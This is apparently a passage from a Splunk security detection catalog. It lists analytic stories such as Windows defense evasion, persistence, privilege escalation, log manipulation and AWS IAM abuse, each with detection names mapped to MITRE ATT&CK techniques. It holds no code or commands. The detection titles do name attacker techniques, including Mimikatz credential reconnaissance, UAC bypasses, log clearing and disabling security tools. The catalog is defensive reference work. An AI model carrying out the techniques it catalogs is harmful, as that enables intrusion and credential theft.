Bypass User Account Control, Masquerading, Port Monitors, Indicator Removal on Host, Registry Run Keys / Startup Folder, Image File Execution Options Injection, Application Shimming, Screen Capture, Create or Modify System Process

Privilege Escalation, Defense Evasion, Defense Evasion, Persistence, Privilege Escalation, Defense Evasion, Persistence, Privilege Escalation, Privilege Escalation, Persistence, Privilege Escalation, Persistence, Collection, Persistence, Privilege Escalation

TTP
Monitor Registry Keys for Print Monitors

T1547.010

Port Monitors

Persistence, Privilege Escalation

TTP
Registry Keys Used For Persistence

T1547.001

Registry Run Keys / Startup Folder

Persistence, Privilege Escalation

TTP
Registry Keys Used For Privilege Escalation

T1546.012

Image File Execution Options Injection

Privilege Escalation, Persistence

TTP
Registry Keys for Creating SHIM Databases

T1546.011

Application Shimming

Privilege Escalation, Persistence

TTP

Kill Chain Phase

  • Actions on Objectives


Reference


version: 1


Suspicious zoom child processes

Attackers are using Zoom as an vector to increase privileges on a sytems. This story detects new child processes of zoom and provides investigative actions for this detection.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2020-04-13
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
Detect Prohibited Applications Spawning cmd exe

T1059.003, T1059, T1068, T1036.003

Windows Command Shell, Command and Scripting Interpreter, Exploitation for Privilege Escalation, Rename System Utilities

Execution, Execution, Privilege Escalation, Defense Evasion

Hunting
Detect Prohibited Applications Spawning cmd exe

T1059

Command and Scripting Interpreter

Execution

TTP
First Time Seen Child Process of Zoom

T1068

Exploitation for Privilege Escalation

Privilege Escalation

Anomaly

Kill Chain Phase

  • Actions on Objectives
  • Exploitation


Reference


version: 1


Trusted developer utilities proxy execution

Monitor and detect behaviors used by attackers who leverage trusted developer utilities to execute malicious code.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2021-01-12
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
Suspicious microsoft workflow compiler rename

T1127, T1036.003

Trusted Developer Utilities Proxy Execution, Rename System Utilities

Defense Evasion, Defense Evasion

Hunting
Suspicious microsoft workflow compiler usage

T1127

Trusted Developer Utilities Proxy Execution

Defense Evasion

TTP

Kill Chain Phase

  • Exploitation


Reference


version: 1


Trusted developer utilities proxy execution msbuild

Monitor and detect techniques used by attackers who leverage the msbuild.exe process to execute malicious code.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2021-01-21
  • Use Case: Advanced Threat Detection

Windows dns sigred cve-2020-1350

Uncover activity consistent with CVE-2020-1350, or SIGRed. Discovered by Checkpoint researchers, this vulnerability affects Windows 2003 to 2019, and is triggered by a malicious DNS response (only affects DNS over TCP). An attacker can use the malicious payload to cause a buffer overflow on the vulnerable system, leading to compromise. The included searches in this Analytic Story are designed to identify the large response payload for SIG and KEY DNS records which can be used for the exploit.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Network_Resolution
  • Last Updated: 2020-07-28
  • Use Case: Advanced Threat Detection

Windows defense evasion tactics

Detect tactics used by malware to evade defenses on Windows endpoints. A few of these include suspicious `reg.exe` processes, files hidden with `attrib.exe` and disabling user-account control, among many others

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2018-05-31
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
Disable Registry Tool

T1562.001, T1564.001, T1548.002, T1112, T1222.001, T1036

Disable or Modify Tools, Hidden Files and Directories, Bypass User Account Control, Modify Registry, Windows File and Directory Permissions Modification, Masquerading

Defense Evasion, Defense Evasion, Privilege Escalation, Defense Evasion, Defense Evasion, Defense Evasion, Defense Evasion

TTP
Disable Show Hidden Files

T1564.001, T1562.001

Hidden Files and Directories, Disable or Modify Tools

Defense Evasion, Defense Evasion

TTP
Disable Windows Behavior Monitoring

T1562.001

Disable or Modify Tools

Defense Evasion

TTP
Disable Windows SmartScreen Protection

T1562.001

Disable or Modify Tools

Defense Evasion

TTP
Disabling CMD Application

T1562.001

Disable or Modify Tools

Defense Evasion

TTP
Disabling ControlPanel

T1562.001

Disable or Modify Tools

Defense Evasion

TTP
Disabling Firewall with Netsh

T1562.001

Disable or Modify Tools

Defense Evasion

TTP
Disabling FolderOptions Windows Feature

T1562.001

Disable or Modify Tools

Defense Evasion

TTP
Disabling NoRun Windows App

T1562.001

Disable or Modify Tools

Defense Evasion

TTP
Disabling Remote User Account Control

T1548.002, T1036, T1547.010, T1070, T1547.001, T1546.012, T1546.011, T1113, T1543

Bypass User Account Control, Masquerading, Port Monitors, Indicator Removal on Host, Registry Run Keys / Startup Folder, Image File Execution Options Injection, Application Shimming, Screen Capture, Create or Modify System Process

Privilege Escalation, Defense Evasion, Defense Evasion, Persistence, Privilege Escalation, Defense Evasion, Persistence, Privilege Escalation, Privilege Escalation, Persistence, Privilege Escalation, Persistence, Collection, Persistence, Privilege Escalation

TTP
Disabling SystemRestore In Registry

T1562.001

Disable or Modify Tools

Defense Evasion

TTP
Disabling Task Manager

T1562.001

Disable or Modify Tools

Defense Evasion

TTP
Eventvwr UAC Bypass

T1548.002

Bypass User Account Control

Privilege Escalation, Defense Evasion

TTP
Excessive number of service control start as disabled

T1562.001

Disable or Modify Tools

Defense Evasion

Anomaly
FodHelper UAC Bypass

T1112, T1548.002

Modify Registry, Bypass User Account Control

Defense Evasion, Privilege Escalation, Defense Evasion

TTP
Hiding Files And Directories With Attrib exe

T1222.001

Windows File and Directory Permissions Modification

Defense Evasion

TTP
NET Profiler UAC bypass

T1548.002

Bypass User Account Control

Privilege Escalation, Defense Evasion

TTP
SLUI RunAs Elevated

T1548.002

Bypass User Account Control

Privilege Escalation, Defense Evasion

TTP
SLUI Spawning a Process

T1548.002

Bypass User Account Control

Privilege Escalation, Defense Evasion

TTP
Sdclt UAC Bypass

T1548.002

Bypass User Account Control

Privilege Escalation, Defense Evasion

TTP
SilentCleanup UAC Bypass

T1548.002

Bypass User Account Control

Privilege Escalation, Defense Evasion

TTP
Suspicious Reg exe Process

T1112

Modify Registry

Defense Evasion

TTP
System Process Running from Unexpected Location

T1036

Masquerading

Defense Evasion

Anomaly
UAC Bypass MMC Load Unsigned Dll

T1548.002

Bypass User Account Control

Privilege Escalation, Defense Evasion

TTP
WSReset UAC Bypass

T1548.002

Bypass User Account Control

Privilege Escalation, Defense Evasion

TTP
Windows DisableAntiSpyware Registry

T1562.001

Disable or Modify Tools

Defense Evasion

TTP

Kill Chain Phase

  • Actions on Objectives
  • Delivery
  • Exploitation
  • Privilege Escalation


Reference


version: 1


Windows discovery techniques

Monitors for behaviors associated with adversaries discovering objects in the environment that can be leveraged in the progression of the attack.

  • Product: Splunk Behavioral Analytics, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • Last Updated: 2021-03-04
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
Reconnaissance and Access to Accounts Groups and Policies via PowerSploit modules

T1078, T1087, T1484, T1199, T1482, T1590, T1591, T1595, T1592, T1007, T1012, T1046, T1047, T1057, T1083, T1518, T1592.002, T1021.002, T1135, T1039, T1053, T1068, T1543, T1547, T1574, T1589.001, T1590.001, T1590.003, T1098, T1595.002, T1055

Valid Accounts, Account Discovery, Domain Policy Modification, Trusted Relationship, Domain Trust Discovery, Gather Victim Network Information, Gather Victim Org Information, Active Scanning, Gather Victim Host Information, System Service Discovery, Query Registry, Network Service Scanning, Windows Management Instrumentation, Process Discovery, File and Directory Discovery, Software Discovery, Software, SMB/Windows Admin Shares, Network Share Discovery, Data from Network Shared Drive, Scheduled Task/Job, Exploitation for Privilege Escalation, Create or Modify System Process, Boot or Logon Autostart Execution, Hijack Execution Flow, Credentials, Domain Properties, Network Trust Dependencies, Account Manipulation, Vulnerability Scanning, Process Injection

Defense Evasion, Persistence, Privilege Escalation, Initial Access, Discovery, Defense Evasion, Privilege Escalation, Initial Access, Discovery, Reconnaissance, Reconnaissance, Reconnaissance, Reconnaissance, Discovery, Discovery, Discovery, Execution, Discovery, Discovery, Discovery, Reconnaissance, Lateral Movement, Discovery, Collection, Execution, Persistence, Privilege Escalation, Privilege Escalation, Persistence, Privilege Escalation, Persistence, Privilege Escalation, Persistence, Privilege Escalation, Defense Evasion, Reconnaissance, Reconnaissance, Reconnaissance, Persistence, Reconnaissance, Defense Evasion, Privilege Escalation

TTP
Reconnaissance and Access to Accounts and Groups via Mimikatz modules

T1078, T1087, T1484

Valid Accounts, Account Discovery, Domain Policy Modification

Defense Evasion, Persistence, Privilege Escalation, Initial Access, Discovery, Defense Evasion, Privilege Escalation

TTP
Reconnaissance and Access to Active Directoty Infrastructure via PowerSploit modules

T1199, T1482, T1590, T1591, T1595

Trusted Relationship, Domain Trust Discovery, Gather Victim Network Information, Gather Victim Org Information, Active Scanning

Initial Access, Discovery, Reconnaissance, Reconnaissance, Reconnaissance

TTP
Reconnaissance and Access to Computers and Domains via PowerSploit modules

T1592, T1590, T1087

Gather Victim Host Information, Gather Victim Network Information, Account Discovery

Reconnaissance, Reconnaissance, Discovery

TTP
Reconnaissance and Access to Computers via Mimikatz modules

T1592

Gather Victim Host Information

Reconnaissance

TTP
Reconnaissance and Access to Operating System Elements via PowerSploit modules

T1007, T1012, T1046, T1047, T1057, T1083, T1518, T1592.002

System Service Discovery, Query Registry, Network Service Scanning, Windows Management Instrumentation, Process Discovery, File and Directory Discovery, Software Discovery, Software

Discovery, Discovery, Discovery, Execution, Discovery, Discovery, Discovery, Reconnaissance

TTP
Reconnaissance and Access to Processes and Services via Mimikatz modules

T1007, T1046, T1057

System Service Discovery, Network Service Scanning, Process Discovery

Discovery, Discovery, Discovery

TTP
Reconnaissance and Access to Shared Resources via Mimikatz modules

T1021.002, T1135, T1039

SMB/Windows Admin Shares, Network Share Discovery, Data from Network Shared Drive

Lateral Movement, Discovery, Collection

TTP
Reconnaissance and Access to Shared Resources via PowerSploit modules

T1021.002, T1135, T1039

SMB/Windows Admin Shares, Network Share Discovery, Data from Network Shared Drive

Lateral Movement, Discovery, Collection

TTP
Reconnaissance of Access and Persistence Opportunities via PowerSploit modules

T1053, T1068, T1078, T1543, T1547, T1574

Scheduled Task/Job, Exploitation for Privilege Escalation, Valid Accounts, Create or Modify System Process, Boot or Logon Autostart Execution, Hijack Execution Flow

Execution, Persistence, Privilege Escalation, Privilege Escalation, Defense Evasion, Persistence, Privilege Escalation, Initial Access, Persistence, Privilege Escalation, Persistence, Privilege Escalation, Persistence, Privilege Escalation, Defense Evasion

TTP
Reconnaissance of Connectivity via PowerSploit modules

T1021.002, T1135, T1039

SMB/Windows Admin Shares, Network Share Discovery, Data from Network Shared Drive

Lateral Movement, Discovery, Collection

TTP
Reconnaissance of Credential Stores and Services via Mimikatz modules

T1589.001, T1590.001, T1590.003, T1068, T1078, T1098

Credentials, Domain Properties, Network Trust Dependencies, Exploitation for Privilege Escalation, Valid Accounts, Account Manipulation

Reconnaissance, Reconnaissance, Reconnaissance, Privilege Escalation, Defense Evasion, Persistence, Privilege Escalation, Initial Access, Persistence

TTP
Reconnaissance of Defensive Tools via PowerSploit modules

T1595.002, T1592.002

Vulnerability Scanning, Software

Reconnaissance, Reconnaissance

TTP
Reconnaissance of Privilege Escalation Opportunities via PowerSploit modules

T1068, T1078, T1098

Exploitation for Privilege Escalation, Valid Accounts, Account Manipulation

Privilege Escalation, Defense Evasion, Persistence, Privilege Escalation, Initial Access, Persistence

TTP
Reconnaissance of Process or Service Hijacking Opportunities via Mimikatz modules

T1543, T1055, T1574

Create or Modify System Process, Process Injection, Hijack Execution Flow

Persistence, Privilege Escalation, Defense Evasion, Privilege Escalation, Persistence, Privilege Escalation, Defense Evasion

TTP

Kill Chain Phase

  • Actions on Objectives


Reference


version: 1


Windows log manipulation

Adversaries often try to cover their tracks by manipulating Windows logs. Use these searches to help you monitor for suspicious activity surrounding log files--an essential component of an effective defense.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2017-09-12
  • Use Case: Security Monitoring

Detection Profile

name ID Technique Tactic Type
Deleting Shadow Copies

T1490, T1070, T1070.001

Inhibit System Recovery, Indicator Removal on Host, Clear Windows Event Logs

Impact, Defense Evasion, Defense Evasion

TTP
Illegal Deletion of Logs via Mimikatz modules

T1070

Indicator Removal on Host

Defense Evasion

TTP
Suspicious Event Log Service Behavior

T1070.001

Clear Windows Event Logs

Defense Evasion

TTP
Suspicious wevtutil Usage

T1070.001

Clear Windows Event Logs

Defense Evasion

TTP
USN Journal Deletion

T1070

Indicator Removal on Host

Defense Evasion

TTP
WevtUtil Usage To Clear Logs

T1070.001

Clear Windows Event Logs

Defense Evasion

TTP
Wevtutil Usage To Disable Logs

T1070.001

Clear Windows Event Logs

Defense Evasion

TTP
Windows Event Log Cleared

T1070.001

Clear Windows Event Logs

Defense Evasion

TTP

Kill Chain Phase

  • Actions on Objectives
  • Exploitation


Reference


version: 2


Windows persistence techniques

Monitor for activities and techniques associated with maintaining persistence on a Windows system--a sign that an adversary may have compromised your environment.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2018-05-31
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
Certutil exe certificate extraction TTP
Detect Path Interception By Creation Of program exe

T1574.009, T1222.001, T1585, T1078, T1098, T1207, T1484, T1053, T1134, T1548, T1547.010, T1574.011, T1547.001, T1546.011, T1543.003, T1053.005, T1068

Path Interception by Unquoted Path, Windows File and Directory Permissions Modification, Establish Accounts, Valid Accounts, Account Manipulation, Rogue Domain Controller, Domain Policy Modification, Scheduled Task/Job, Access Token Manipulation, Abuse Elevation Control Mechanism, Port Monitors, Services Registry Permissions Weakness, Registry Run Keys / Startup Folder, Application Shimming, Windows Service, Scheduled Task, Exploitation for Privilege Escalation

Persistence, Privilege Escalation, Defense Evasion, Defense Evasion, Resource Development, Defense Evasion, Persistence, Privilege Escalation, Initial Access, Persistence, Defense Evasion, Defense Evasion, Privilege Escalation, Execution, Persistence, Privilege Escalation, Defense Evasion, Privilege Escalation, Privilege Escalation, Defense Evasion, Persistence, Privilege Escalation, Persistence, Privilege Escalation, Defense Evasion, Persistence, Privilege Escalation, Privilege Escalation, Persistence, Persistence, Privilege Escalation, Execution, Persistence, Privilege Escalation, Privilege Escalation

TTP
Hiding Files And Directories With Attrib exe

T1222.001

Windows File and Directory Permissions Modification

Defense Evasion

TTP
Illegal Account Creation via PowerSploit modules

T1585

Establish Accounts

Resource Development

TTP
Illegal Enabling or Disabling of Accounts via DSInternals modules

T1078, T1098

Valid Accounts, Account Manipulation

Defense Evasion, Persistence, Privilege Escalation, Initial Access, Persistence

TTP
Illegal Management of Active Directory Elements and Policies via DSInternals modules

T1098, T1207, T1484

Account Manipulation, Rogue Domain Controller, Domain Policy Modification

Persistence, Defense Evasion, Defense Evasion, Privilege Escalation

TTP
Illegal Management of Computers and Active Directory Elements via PowerSploit modules

T1098, T1207, T1484

Account Manipulation, Rogue Domain Controller, Domain Policy Modification

Persistence, Defense Evasion, Defense Evasion, Privilege Escalation

TTP
Illegal Privilege Elevation and Persistence via PowerSploit modules

T1053, T1134, T1548

Scheduled Task/Job, Access Token Manipulation, Abuse Elevation Control Mechanism

Execution, Persistence, Privilege Escalation, Defense Evasion, Privilege Escalation, Privilege Escalation, Defense Evasion

TTP
Monitor Registry Keys for Print Monitors

T1547.010

Port Monitors

Persistence, Privilege Escalation

TTP
Reg exe Manipulating Windows Services Registry Keys

T1574.011

Services Registry Permissions Weakness

Persistence, Privilege Escalation, Defense Evasion

TTP
Registry Keys Used For Persistence

T1547.001

Registry Run Keys / Startup Folder

Persistence, Privilege Escalation

TTP
Registry Keys for Creating SHIM Databases

T1546.011

Application Shimming

Privilege Escalation, Persistence

TTP
Sc exe Manipulating Windows Services

T1543.003

Windows Service

Persistence, Privilege Escalation

TTP
Schedule Task with HTTP Command Arguments

T1053

Scheduled Task/Job

Execution, Persistence, Privilege Escalation

TTP
Schedule Task with Rundll32 Command Trigger

T1053

Scheduled Task/Job

Execution, Persistence, Privilege Escalation

TTP
Schtasks used for forcing a reboot

T1053.005

Scheduled Task

Execution, Persistence, Privilege Escalation

TTP
Setting Credentials via DSInternals modules

T1068, T1078, T1098

Exploitation for Privilege Escalation, Valid Accounts, Account Manipulation

Privilege Escalation, Defense Evasion, Persistence, Privilege Escalation, Initial Access, Persistence

TTP
Setting Credentials via Mimikatz modules

T1068, T1078, T1098

Exploitation for Privilege Escalation, Valid Accounts, Account Manipulation

Privilege Escalation, Defense Evasion, Persistence, Privilege Escalation, Initial Access, Persistence

TTP
Setting Credentials via PowerSploit modules

T1068, T1078, T1098

Exploitation for Privilege Escalation, Valid Accounts, Account Manipulation

Privilege Escalation, Defense Evasion, Persistence, Privilege Escalation, Initial Access, Persistence

TTP
Shim Database File Creation

T1546.011

Application Shimming

Privilege Escalation, Persistence

TTP
Shim Database Installation With Suspicious Parameters

T1546.011

Application Shimming

Privilege Escalation, Persistence

TTP
Suspicious Scheduled Task from Public Directory

T1053.005

Scheduled Task

Execution, Persistence, Privilege Escalation

Anomaly
WinEvent Scheduled Task Created Within Public Path

T1053.005

Scheduled Task

Execution, Persistence, Privilege Escalation

TTP
WinEvent Scheduled Task Created to Spawn Shell

T1053.005

Scheduled Task

Execution, Persistence, Privilege Escalation

TTP

Kill Chain Phase

  • Actions on Objectives
  • Exploitation
  • Installation
  • Privilege Escalation


Reference


version: 2


Windows privilege escalation

Monitor for and investigate activities that may be associated with a Windows privilege-escalation attack, including unusual processes running on endpoints, modified registry keys, and more.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2020-02-04
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
Child Processes of Spoolsv exe

T1068, T1134, T1548, T1546.008, T1078, T1098, T1546.012

Exploitation for Privilege Escalation, Access Token Manipulation, Abuse Elevation Control Mechanism, Accessibility Features, Valid Accounts, Account Manipulation, Image File Execution Options Injection

Privilege Escalation, Defense Evasion, Privilege Escalation, Privilege Escalation, Defense Evasion, Privilege Escalation, Persistence, Defense Evasion, Persistence, Privilege Escalation, Initial Access, Persistence, Privilege Escalation, Persistence

TTP
Illegal Privilege Elevation via Mimikatz modules

T1134, T1548

Access Token Manipulation, Abuse Elevation Control Mechanism

Defense Evasion, Privilege Escalation, Privilege Escalation, Defense Evasion

TTP
Overwriting Accessibility Binaries

T1546.008

Accessibility Features

Privilege Escalation, Persistence

TTP
Probing Access with Stolen Credentials via PowerSploit modules

T1078, T1098

Valid Accounts, Account Manipulation

Defense Evasion, Persistence, Privilege Escalation, Initial Access, Persistence

TTP
Registry Keys Used For Privilege Escalation

T1546.012

Image File Execution Options Injection

Privilege Escalation, Persistence

TTP

Kill Chain Phase

  • Actions on Objectives
  • Exploitation


Reference


version: 2



Best Practices

Asset tracking

Keep a careful inventory of every asset on your network to make it easier to detect rogue devices. Unauthorized/unmanaged devices could be an indication of malicious behavior that should be investigated further.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Network_Sessions
  • Last Updated: 2017-09-13
  • Use Case: Security Monitoring

Detection Profile

name ID Technique Tactic Type
Detect Unauthorized Assets by MAC address TTP

Kill Chain Phase

  • Actions on Objectives
  • Delivery
  • Reconnaissance


Reference


version: 1


Monitor for updates

Monitor your enterprise to ensure that your endpoints are being patched and updated. Adversaries notoriously exploit known vulnerabilities that could be mitigated by applying routine security patches.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Updates
  • Last Updated: 2017-09-15
  • Use Case: Compliance

Detection Profile

name ID Technique Tactic Type
No Windows Updates in a time frame Hunting

Kill Chain Phase

Reference


version: 1


Prohibited traffic allowed or protocol mismatch

Detect instances of prohibited network traffic allowed in the environment, as well as protocols running on non-standard ports. Both of these types of behaviors typically violate policy and can be leveraged by attackers.

Detection Profile

name ID Technique Tactic Type
Allow Inbound Traffic By Firewall Rule Registry

T1021.001, T1189, T1021, T1048, T1048.003, T1071.001

Remote Desktop Protocol, Drive-by Compromise, Remote Services, Exfiltration Over Alternative Protocol, Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol, Web Protocols

Lateral Movement, Initial Access, Lateral Movement, Exfiltration, Exfiltration, Command And Control

TTP
Allow Inbound Traffic In Firewall Rule

T1021.001

Remote Desktop Protocol

Lateral Movement

TTP
Detect hosts connecting to dynamic domain providers

T1189

Drive-by Compromise

Initial Access

TTP
Enable RDP In Other Port Number

T1021

Remote Services

Lateral Movement

TTP
Prohibited Network Traffic Allowed

T1048

Exfiltration Over Alternative Protocol

Exfiltration

TTP
Protocol or Port Mismatch

T1048.003

Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol

Exfiltration

Anomaly
TOR Traffic

T1071.001

Web Protocols

Command And Control

TTP

Kill Chain Phase

  • Actions on Objectives
  • Command and Control
  • Delivery
  • Exploitation


Reference


version: 1


Router and infrastructure security

Validate the security configuration of network infrastructure and verify that only authorized users and systems are accessing critical assets. Core routing and switching infrastructure are common strategic targets for attackers.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Authentication, Network_Traffic
  • Last Updated: 2017-09-12
  • Use Case: Security Monitoring

Detection Profile

name ID Technique Tactic Type
Detect ARP Poisoning

T1200, T1498, T1557.002, T1557, T1542.005, T1020.001

Hardware Additions, Network Denial of Service, ARP Cache Poisoning, Man-in-the-Middle, TFTP Boot, Traffic Duplication

Initial Access, Impact, Credential Access, Collection, Credential Access, Collection, Defense Evasion, Persistence, Exfiltration

TTP
Detect IPv6 Network Infrastructure Threats

T1200, T1498, T1557.002

Hardware Additions, Network Denial of Service, ARP Cache Poisoning

Initial Access, Impact, Credential Access, Collection

TTP
Detect New Login Attempts to Routers TTP
Detect Port Security Violation

T1200, T1498, T1557.002

Hardware Additions, Network Denial of Service, ARP Cache Poisoning

Initial Access, Impact, Credential Access, Collection

TTP
Detect Rogue DHCP Server

T1200, T1498, T1557

Hardware Additions, Network Denial of Service, Man-in-the-Middle

Initial Access, Impact, Credential Access, Collection

TTP
Detect Software Download To Network Device

T1542.005

TFTP Boot

Defense Evasion, Persistence

TTP
Detect Traffic Mirroring

T1200, T1498, T1020.001

Hardware Additions, Network Denial of Service, Traffic Duplication

Initial Access, Impact, Exfiltration

TTP

Kill Chain Phase

  • Actions on Objectives
  • Delivery
  • Exploitation
  • Reconnaissance


Reference


version: 1


Use of cleartext protocols

Leverage searches that detect cleartext network protocols that may leak credentials or should otherwise be encrypted.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Network_Traffic
  • Last Updated: 2017-09-15
  • Use Case: Security Monitoring

Detection Profile

name ID Technique Tactic Type
Protocols passing authentication in cleartext TTP

Kill Chain Phase

  • Actions on Objectives
  • Reconnaissance


Reference


version: 1



Cloud Security

Aws cross account activity

Track when a user assumes an IAM role in another AWS account to obtain cross-account access to services and resources in that account. Accessing new roles could be an indication of malicious activity.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • Last Updated: 2018-06-04
  • Use Case: Security Monitoring

Detection Profile

name ID Technique Tactic Type
aws detect attach to role policy

T1078, T1550

Valid Accounts, Use Alternate Authentication Material

Defense Evasion, Persistence, Privilege Escalation, Initial Access, Defense Evasion, Lateral Movement

Hunting
aws detect permanent key creation

T1078

Valid Accounts

Defense Evasion, Persistence, Privilege Escalation, Initial Access

Hunting
aws detect role creation

T1078

Valid Accounts

Defense Evasion, Persistence, Privilege Escalation, Initial Access

Hunting
aws detect sts assume role abuse

T1078

Valid Accounts

Defense Evasion, Persistence, Privilege Escalation, Initial Access

Hunting
aws detect sts get session token abuse

T1550

Use Alternate Authentication Material

Defense Evasion, Lateral Movement

Hunting

Kill Chain Phase

  • Lateral Movement


Reference


version: 1


Aws iam privilege escalation

This analytic story contains detections that query your AWS Cloudtrail for activities related to privilege escalation.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • Last Updated: 2021-03-08
  • Use Case: Security Monitoring

Detection Profile

name ID Technique Tactic Type
AWS Create Policy Version to allow all resources

T1078.004, T1136.003, T1580, T1110, T1098, T1069.003

Cloud Accounts, Cloud Account, Cloud Infrastructure Discovery, Brute Force, Account Manipulation, Cloud Groups

Defense Evasion, Persistence, Privilege Escalation, Initial Access, Persistence, Discovery, Credential Access, Persistence, Discovery

TTP
AWS CreateAccessKey

T1136.003

Cloud Account

Persistence

Hunting
AWS CreateLoginProfile

T1136.003

Cloud Account

Persistence

TTP
AWS IAM Assume Role Policy Brute Force

T1580, T1110

Cloud Infrastructure Discovery, Brute Force

Discovery, Credential Access

TTP
AWS IAM Delete Policy

T1098

Account Manipulation

Persistence

Hunting
AWS IAM Failure Group Deletion

T1098

Account Manipulation

Persistence

Anomaly
AWS IAM Successful Group Deletion

T1069.003, T1098

Cloud Groups, Account Manipulation

Discovery, Persistence

Hunting
AWS SetDefaultPolicyVersion

T1078.004

Cloud Accounts

Defense Evasion, Persistence, Privilege Escalation, Initial Access

TTP
AWS UpdateLoginProfile

T1136.003

Cloud Account

Persistence

TTP

Kill Chain Phase

  • Actions on Objectives
  • Reconnaissance


Reference


version: 1


Aws network acl activity

Monitor your AWS network infrastructure for bad configurations and malicious activity. Investigative searches help you probe deeper, when the facts warrant it.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • Last Updated: 2018-05-21
  • Use Case: Security Monitoring

Detection Profile

name ID Technique Tactic Type
AWS Network Access Control List Created with All Open Ports

T1562.007

Disable or Modify Cloud Firewall

Defense Evasion

TTP
AWS Network Access Control List Deleted

T1562.007

Disable or Modify Cloud Firewall

Defense Evasion

Anomaly
Detect Spike in blocked Outbound Traffic from your AWS Anomaly

Kill Chain Phase

  • Actions on Objectives
  • Command and Control


Reference


version: 2


Aws security hub alerts

This story is focused around detecting Security Hub alerts generated from AWS

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • Last Updated: 2020-08-04
  • Use Case: Security Monitoring

Detection Profile

name ID Technique Tactic Type
Detect Spike in AWS Security Hub Alerts for EC2 Instance Anomaly
Detect Spike in AWS Security Hub Alerts for User Anomaly

Kill Chain Phase

Reference


version: 1


Aws user monitoring

Detect and investigate dormant user accounts for your AWS environment that have become active again. Because inactive and ad-hoc accounts are common attack targets, it's critical to enable governance within your environment.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • Last Updated: 2018-03-12
  • Use Case: Security Monitoring

Detection Profile

name ID Technique Tactic Type
AWS Excessive Security Scanning

T1526

Cloud Service Discovery

Discovery

TTP

Kill Chain Phase

  • Actions on Objectives


Reference


version: 1


Cloud cryptomining

Monitor your cloud compute instances for activities related to cryptojacking/cryptomining. New instances that originate from previously unseen regions, users who launch abnormally high numbers of instances, or compute instances started by previously unseen users are just a few examples of potentially malicious behavior.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Change
  • Last Updated: 2019-10-02
  • Use Case: Security Monitoring

Detection Profile

name ID Technique Tactic Type
Abnormally High Number Of Cloud Instances Launched

T1078.004, T1535

Cloud Accounts, Unused/Unsupported Cloud Regions

Defense Evasion, Persistence, Privilege Escalation, Initial Access, Defense Evasion

Anomaly
Cloud Compute Instance Created By Previously Unseen User

T1078.004

Cloud Accounts

Defense Evasion, Persistence, Privilege Escalation, Initial Access

Anomaly
Cloud Compute Instance Created In Previously Unused Region

T1535

Unused/Unsupported Cloud Regions

Defense Evasion

Anomaly
Cloud Compute Instance Created With Previously Unseen Image Anomaly
Cloud Compute Instance Created With Previously Unseen Instance Type Anomaly

Kill Chain Phase

  • Actions on Objectives


Reference


version: 1


Cloud federated credential abuse

This analytical story addresses events that indicate abuse of cloud federated credentials. These credentials are usually extracted from endpoint desktop or servers specially those servers that provide federation services such as Windows Active Directory Federation Services. Identity Federation relies on objects such as Oauth2 tokens, cookies or SAML assertions in order to provide seamless access between cloud and perimeter environments. If these objects are either hijacked or forged then attackers will be able to pivot into victim's cloud environements.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2021-01-26
  • Use Case: Security Monitoring

Detection Profile

name ID Technique Tactic Type
AWS SAML Access by Provider User and Principal

T1078, T1003.001, T1136.003, T1556, T1546.012

Valid Accounts, LSASS Memory, Cloud Account, Modify Authentication Process, Image File Execution Options Injection

Defense Evasion, Persistence, Privilege Escalation, Initial Access, Credential Access, Persistence, Credential Access, Defense Evasion, Persistence, Privilege Escalation, Persistence

Anomaly
AWS SAML Update identity provider

T1078

Valid Accounts

Defense Evasion, Persistence, Privilege Escalation, Initial Access

TTP
Certutil exe certificate extraction TTP
Detect Mimikatz Using Loaded Images

T1003.001

LSASS Memory

Credential Access

TTP
Detect Rare Executables Anomaly
O365 Add App Role Assignment Grant User

T1136.003

Cloud Account

Persistence

TTP
O365 Added Service Principal

T1136.003

Cloud Account

Persistence

TTP
O365 Excessive SSO logon errors

T1556

Modify Authentication Process

Credential Access, Defense Evasion, Persistence

Anomaly
O365 New Federated Domain Added

T1136.003

Cloud Account

Persistence

TTP
